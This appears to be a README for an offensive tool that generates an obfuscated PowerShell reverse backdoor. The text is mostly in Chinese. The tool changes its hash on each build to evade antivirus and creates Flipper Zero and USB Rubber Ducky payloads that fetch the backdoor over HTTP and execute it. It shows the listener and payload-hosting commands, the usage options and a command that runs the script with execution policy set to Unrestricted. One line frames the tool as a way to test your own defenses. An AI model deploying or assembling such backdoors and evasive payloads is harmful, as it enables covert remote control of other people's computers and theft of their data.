
用PowerShell编写并通过Python混淆的反向后门。它为流行的黑客设备(如Flipper Zero和Hak5 USB Rubber Ducky)生成有效载荷,并在每次构建后更改其签名以帮助规避AV。
/******************************************************************************
用PowerShell编写、Python混淆的反向后门工具,每次构建后生成新签名以规避检测。该工具能够为Flipper Zero和Hak5 USB Rubber Ducky等流行黑客设备创建载荷。使用本工具测试您的系统对高级攻击技术的防御能力。
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]
Powershell Backdoor Generator
options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL conversion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
当前工作目录中将生成一个名为 backdoor.ps1 的文件。
已在Windows 11、Windows 10和Kali Linux上测试。要以隐藏窗口并持久化方式运行,请参考此指南
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1
使用这些攻击中的任何一种,您都将开启一个HTTP服务器来托管后门。后门被获取后,HTTP服务器将关闭。
以下命令将生成一个名为 powershell_backdoor.txt 的文件,当在Flipper上触发时,它会从您的计算机通过HTTP获取后门并执行。
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
将您指定的文本文件(例如 powershell_backdoor.txt)放入您的Flipper Zero。当载荷执行时,它将下载并执行 backdoor.ps1。
以下是关于如何为Hak5 USB Rubber Ducky生成 inject.bin 文件的教程。
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
一个名为 inject.bin 的文件将被放置在您当前的工作目录中。此功能需要Java。当载荷执行时,它将下载并执行 backdoor.ps1。
为了将 payload.txt 编码为 inject.bin 以用于USB Rubber Ducky攻击,我使用了由 创建的 encoder.jar。
以下是5次构建后 backdoor.ps1 的sha1哈希值。
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49